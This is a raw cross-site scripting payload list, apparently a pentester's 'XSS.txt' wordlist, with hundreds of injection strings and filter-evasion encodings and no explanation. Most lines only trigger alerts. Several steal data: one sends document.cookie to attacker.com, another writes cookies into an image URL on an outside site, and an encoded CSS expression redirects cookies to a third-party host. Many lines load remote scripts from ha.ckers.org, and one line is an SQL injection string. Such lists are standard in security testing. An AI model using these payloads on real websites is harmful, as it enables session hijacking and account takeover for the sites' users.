XSS.txt

<a onclick="alert(omurugur);">/
"><img src=x onerror=prompt(/omur/)> 
");</script><script>alert(1)</script>"
"><aUdIo SrC=x OnErRoR=alert(71465)>');"  
"><svg/onload;=alert(1)>
?templid=1%27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
?attribute='</script><body onload&value=alert(document.cookie)
?value=A%27)%3b}%3balert(document.cookie)%3bif(0){var+html%3dwindow.opener.document.querySelector(%27[%3d"
?value=%22a%27);//%3C/script%3E%3Cbody%20onload=alert(document.cookie)%3E
\uFF1C%\uFE64input/autofocus onfocus\b='[1].find(alert)'
"><img src=x onerror=alert(document.domain)>
<form action="javascript:alert(document.domain)"><button>Click</button></form>
"/><script>alert(1)</script>
//x:1/:///%01javascript:alert(document.cookie)/
<a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
%0aalert(1);/”><script>///
“><iframe src=”/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)”
*//”><script>/*alert(1)//
"onmouseover='prompt(1)'bad=">
--></sCrIpT><sCrIpT>alert(1234)</sCrIpT>
"><script src=https://x.com></script>
/<svg%20onload=alert(eval(‘document’+unescape(unescape(“%252e”))%2b’domain’))>
test'"()&%<acx><ScRiPt >prompt(1)</ScRiPt>
"()&%<ScRiPt >prompt(/XSS/)</ScRiPt>
1"sTYLe='acu:Expre/**/SSion(prompt(1))'bad=">
'><img/src=''onerror='alert(atob(/PDMgVHJlbGxv/.source))
' OR '1'='1' #
"onmouseover='prompt(1)'bad=">
<svG onLoad=prompt(1)>
?29ced"><script>alert(1)</script>9d013=1  
"><img+src=1+onerror=alert('hacı')>&action=edit&comment=123\">
</script><script type=text/javascript>alert(123)</script>
<link href="javascript:alert(1)" rel="next"> 
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
<a%20href="java%1B%28Jscript:alert%281%29">
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
<svg%20xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle%20r=100%20/><animate%20attributeName="xlink:href"%20values=";javascript:alert(1)"%20begin="0s"%20dur="0.1s"%20fill="freeze"/>
<a[\x0b]onmouseover=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>
eval("aler"+(!![]+[])[+[]])("xss")
this["document"]["cookie"]
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
document['\x63\x6f\x6f\x6b\x69\x65']
%E2%80%B9%25tag+style%3D%22xss%3Aexpression%28alert%28123%29%29%22+%E2%80%BA
\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
%uff1cscript%uff1ealert(123456);%uff1c/script%uff1e
<%tag style="xss:expression(alert(123))">
%uff1cscript%uff1ealert(123456)%uff1c/script%uff1e
"123"+style="behavior:url(http://www.biznet.com.tr/xss.htc)"
"><img src='/Content/TTNet/Images/logo_user.gif'onerror=javascript:alert("XSS")>
<img src=1 onerror=innerHTML=location.hash> and http://victim.com#<img src=1 onerror=alert(1)>
<img src=sa onerror=eval(document.location.hash.substr(1))>
<script>alert('httpOnly Test: '  +document.cookie)</script>
<rss version="2.0">
 <channel>
   <item>
     <title>BIZNET RSS XSS TEST &lt;script>alert("BIZNET");&lt;/script></title>
   </item>
 </channel>
</rss>
<img/src='x'/onerror='alert(1)'/>
<img/src=”x”/onerror=”alert(1)”/>
"></iframe><img/src="x"/onerror="alert(1)"/><"
<img src=/ onerror=alert(1)>
<img/src/onerror=alert(1)>
"+style="bahaviour:expression(function{}{ alert('xxs') }(this)}'
" type="image" src="dontcare.jpg" onerror="alert(123)
'%26%26'javascript:alert%25281%2529// 
http://site/utf-7.html?--+AD4-+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
%A2%BE%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
0;url=javascript:alert(1)" http-equiv="refresh" "
<!</textarea <body onload='alert(1)'> 
<script>decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;</script> 
<img/src="mars.png"alt="mars">
<object data="javascript:alert(0)">
<object><param name="src" value="javascript:alert(0)"></param></object>
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
";location=location.hash)//#0={};alert(0)
alert(document.cookie)
alert(document['cookie'])
with(document)alert(cookie)
</a onmousemove="alert(1)">
";document.write('<img sr'%2b'c=http://www.site.com/xss?'%2bdocument['cookie']%2b'>');"
<script x>alert(1)</script>/
%22%27%2F%3E%3Cscript%3Ealert%28'Props+To+TheRat'%29%3C%2Fscript%3E
'});%0aalert(1);%20//
<script>String.fromCharCode(107, 51, 110, 122, 48)</script>
"+onmouseover="window.location='http://www.biznet.com.tr'
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
<ScriPt>ALeRt("i am here")</scriPt>
%00<script>alert('XSS')</script>
?>'"><script>alert(90889)</script>
%22%20onmouseover%3dalert(String.fromCharCode(88,83,83))%20par%3d%22
%3Cbody%20onload=alert(document.cookie)%3E
%3ciMg+SrC%3dx+OnErRoR%3dalert(51336)%3e
<img%20src%3da%20onerror%3dalert(1)>
%A2%BE%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
”>alert(String.fromCharCode(88,83,83));
" onmouseover=alert(23)
"+onkeypress="alert(23)"+"
"+onmouseover="alert(1)"+"
111"+onmouseover=alert(11123);
'onfocus='alert(0x000381)'
'onclick='alert(0x000381)'
%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e
"><SCRIPT SRC="http://www.biznet.com.tr/turkcell_xss.jpg"></SCRIPT>
&lt;script&gt;&lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;&lt;/script&gt;
%00&lt;script&gt;&lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;&lt;/script&gt;
&lt;BGSOUND SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;
&quot&gt&lt;script&gt;&lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;&lt;/script&gt;
\'\");|]*{%0d%0a<%00 
/"'></SCRIPT></TITLE></TEXTAREA>'/"></XSS/*-*/STYLE=xss:e/**/xpression(try{a=firstTime}catch(e){firstTime=1;alert(793202)})>
<script>alert('XSS')</script>
"><script>alert('XSS')</script>
"/><script>alert('XSS')</script>
'><script>alert('XSS')</script>
>"'><script>alert('XSS')</script>
/><script>alert('XSS')</script>
';}</script><script>alert('XSS')</script>
%27%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%6F%27%29%3C%2F%73%63%72%69%70%74%3E
%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%6F%27%29%3C%2F%73%63%72%69%70%74%3E
%3E%22%27%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E
%2F%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%6F%27%29%3C%2F%73%63%72%69%70%74%3E
%u0027%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0048%u0065%u006c%u006c%u006f%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%u0022%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0048%u0065%u006c%u006c%u006f%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%u003e%u0022%u0027%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0058%u0053%u0053%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%u002f%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0048%u0065%u006c%u006c%u006f%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%0027%003e%003cscript%003ealert%0028%0027Hello%0027%0029%003c%002fscript%003e
%0022%003e%003cscript%003ealert%0028%0027Hello%0027%0029%003c%002fscript%003e
%003e%0022%0027%003e%003cscript%003ealert%0028%0027XSS%0027%0029%003c%002fscript%003e
%002f%003e%003cscript%003ealert%0028%0027Hello%0027%0029%003c%002fscript%003e
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<SCR\0IPT>alert("XSS")</SCR\0IPT>
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt	p://6&#9;6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
%22%20style%3D%22background:expression(alert(1))%22%20OA%3D%22
3c%2fscript%3e%3cscript%3ealert(1);%3c%2fscript%3e
"+on mouse over ="*****('XSS')
"><sCrIpT>alert(02164699099)</sCrIpT>
document.write("\u003Cscript src=http://ha.ckers.org/xss.js\u003E\u003C/script\u003E");
<SCRIPT>alert('XSS')</SCRIPT>
%3CSCRIPT%3Ealert%283%29%3C%2FSCRIPT%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG LOWSRC="javascript:alert('XSS');">
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert(1);//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=//ha.ckers.org/.j
<IMG SRC="javascript:alert('XSS')"
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/%0a%0dalert(a.source)</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt	p://6&#09;6.000146.0x7.147/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
%3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E
<script>alert(document.location)</script>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=CP932
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&eo=MS932
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&cs=jis
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&charset=utf8
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&enc=sjis
left:expression(eval(alert(1)))
#444;background-image: expression(alert(1)); 
width:expression(eval( String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,102,101,114,114,117,104,46,109,97,118,105,116,117,110,97,46,99,111,109,47,120,115,115,47,63,39,43,101,115,99,97,112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))
%22%20onload=%22this.src='http://www.unirostock.de';this.onload=function(){};%22%20x=%22
XSS%22%3E%3C/div%3E%3Ciframe%20src=http://www.unirostock.de%20style=width:600px;height:500px%3E
